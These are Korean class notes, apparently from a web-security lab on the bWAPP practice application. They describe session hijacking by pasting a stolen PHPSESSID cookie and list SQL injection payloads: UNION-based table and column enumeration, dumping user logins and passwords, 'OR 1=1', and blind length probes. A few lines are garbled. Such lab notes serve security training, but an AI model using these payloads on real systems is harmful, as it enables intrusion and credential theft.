클래스 > 정의 후
Regex 개념
OwapsTOP10
오래된 OS 알려진 취약점
공격기법중 brutal force 는 2가지 취약점이 있음
BWPAP으로 세션 탈취 공격해보기
Cookie: PHPSESSID= 비밀; SL_G_WPT_TO=ko; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1
A 의 크롬에서 갖고온 쿠키값을 이용해서
Burp Suite 내에서 킨 Chrome에서 BWAPP내에 쿠키값에 세션을 붙여넣으면 다른 계정으로 로그인가능
세션 탈취 가능 -> 세션키를 개발자 도구에 덮어쓰기 할 경우 id 및 pw 를 탈취한 걸로 바꿔서 인식시킬수있다.
세션..해킹 어려웠다.
'UNION SELECT 1,2,3,4,5,6,7 #
#은 주석
'UNION SELECT 1@@version #
MAN'UNION SELECT 1@@vMAN'UNION SELECT 1,database(),2,3,4,5,6,7 #ersion #
MAN'UNION SELECT 1,2,3,4,5,6,7 #
MAN'UNION SELECT 1,database(),2,3,4,5,6,7 #
'UNION SELECT 1,2,3,4,5,6,7 FROM information_schema.tables #
MAN'UNION SELECT 1,table_name,3,4,5,6,7 FROM information_schema.tables #
'OR 1=1 #
'UNION SELECT 1,database(),3,4,5,6,7 FROM information_schema.tables #
MAN'UNION SELECT 1,column_name,3,4,5,6,7 FROM information_schema.columns where table_name='users' #
MAN'UNION SELECT 1,id,login,password,5,6,7 FROM users #
MAN' or 1=length(databsase()) #
MAN' or 5=length(databsase()) #